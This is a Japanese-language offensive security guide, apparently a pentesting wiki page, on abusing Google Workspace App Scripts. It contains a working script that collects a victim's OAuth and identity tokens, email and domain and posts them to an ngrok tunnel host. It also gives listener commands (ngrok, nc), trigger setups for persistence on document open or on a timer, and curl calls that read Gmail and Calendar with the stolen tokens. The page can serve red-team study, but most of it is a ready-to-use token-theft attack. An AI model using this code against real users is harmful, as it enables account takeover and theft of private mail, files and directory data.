GWS - App Scripts

Reading time: 13 minutes

App Scripts

App ScriptsはユーザーがApp Scriptにリンクされたドキュメントにエディタ権限でアクセスしたときにトリガーされるコードであり、OAuthプロンプトを受け入れた後に実行されます。
また、App Scriptの所有者によって特定の時間ごとに実行されるように設定することもできます（Persistence）。

App Scriptの作成

App Scriptを作成する方法はいくつかありますが、最も一般的な方法はGoogleドキュメント（任意のタイプ）からとスタンドアロンプロジェクトとして作成することです：

App Scriptシナリオ

App ScriptでGoogle Sheetを作成する

App Scriptを作成することから始めます。このシナリオに対する私の推奨は、Google Sheetを作成し、**拡張機能 > App Scripts**に移動することです。これにより、シートにリンクされた新しいApp Scriptが開きます。

トークンの漏洩

OAuthトークンへのアクセスを提供するには、サービス +をクリックし、次のようなスコープを追加する必要があります：

• AdminDirectory: ディレクトリのユーザーとグループにアクセス（ユーザーに十分な権限がある場合）
• Gmail: Gmailデータにアクセス
• Drive: Driveデータにアクセス
• Google Sheets API: トリガーと連携するため

必要なスコープを自分で変更するには、プロジェクト設定に移動し、エディタで "appsscript.json" マニフェストファイルを表示を有効にします。

function getToken() {
var userEmail = Session.getActiveUser().getEmail()
var domain = userEmail.substring(userEmail.lastIndexOf("@") + 1)
var oauthToken = ScriptApp.getOAuthToken()
var identityToken = ScriptApp.getIdentityToken()

// Data json
data = {
oauthToken: oauthToken,
identityToken: identityToken,
email: userEmail,
domain: domain,
}

// Send data
makePostRequest(data)

// Use the APIs, if you don't even if the have configured them in appscript.json the App script won't ask for permissions

// To ask for AdminDirectory permissions
var pageToken = ""
page = AdminDirectory.Users.list({
domain: domain, // Use the extracted domain
orderBy: "givenName",
maxResults: 100,
pageToken: pageToken,
})

// To ask for gmail permissions
var threads = GmailApp.getInboxThreads(0, 10)

// To ask for drive permissions
var files = DriveApp.getFiles()
}

function makePostRequest(data) {
var url = "http://5.tcp.eu.ngrok.io:12027"

var options = {
method: "post",
contentType: "application/json",
payload: JSON.stringify(data),
}

try {
UrlFetchApp.fetch(url, options)
} catch (e) {
Logger.log("Error making POST request: " + e.toString())
}
}

リクエストをキャプチャするには、次のコマンドを実行するだけです:

ngrok tcp 4444
nc -lv 4444 #macOS

App Scriptを実行するために要求される権限：

トリガーの作成

アプリを読み込んだら、⏰ トリガーをクリックしてトリガーを作成します。関数として**getTokenを選択し、デプロイメントはHead、イベントソースはFrom spreadsheet、イベントタイプはOn openまたはOn edit**（必要に応じて）を選択し、保存します。

デバッグしたい場合は、実行タブでApp Scriptsの実行を確認できます。

共有

App Scriptをトリガーするためには、被害者が編集者アクセスで接続する必要があります。

共有されたドキュメントの悪用

共有の代わりにコピー

ドキュメントを共有するためのリンクを作成すると、次のようなリンクが作成されます：https://docs.google.com/spreadsheets/d/1i5[...]aIUD/edit
**"/edit"の部分を"/copy"**に変更すると、Googleはアクセスするのではなく、ドキュメントのコピーを生成するかどうかを尋ねます：

ユーザーがそれをコピーしてアクセスすると、ドキュメントの内容とApp Scriptsがコピーされますが、トリガーはコピーされないため、何も実行されません。

Webアプリケーションとしての共有

App ScriptをWebアプリケーションとして共有することも可能です（App ScriptのエディタでWebアプリケーションとしてデプロイします）が、次のようなアラートが表示されます：

その後、必要な権限を求める典型的なOAuthプロンプトが表示されます。

テスト

収集したトークンを使用してメールをリストするには、次のコマンドをテストできます：

curl -X GET "https://www.googleapis.com/gmail/v1/users/<user@email>/messages" \
-H "Authorization: Bearer <token>"

ユーザーのカレンダーをリストする:

curl -H "Authorization: Bearer $OAUTH_TOKEN" \
-H "Accept: application/json" \
"https://www.googleapis.com/calendar/v3/users/me/calendarList"

App Script as Persistence

持続性のための1つのオプションは、ドキュメントを作成し、getToken関数のトリガーを追加し、攻撃者とドキュメントを共有することです。これにより、攻撃者がファイルを開くたびに、被害者のトークンを抽出します。

また、App Scriptを作成し、X時間ごとにトリガーを設定することも可能です（例えば、毎分、毎時、毎日...）。資格情報や被害者のセッションを侵害した攻撃者は、App Scriptの時間トリガーを設定し、非常に特権的なOAuthトークンを毎日漏洩させることができます：

App Scriptを作成し、トリガーに移動し、トリガーを追加をクリックし、イベントソースとして時間駆動を選択し、あなたに最適なオプションを選択します：

Shared Document Unverified Prompt Bypass

さらに、誰かが編集者アクセスを持つドキュメントを共有した場合、ドキュメント内にApp Scriptsを生成することができ、ドキュメントの所有者（作成者）がApp Scriptの所有者になります。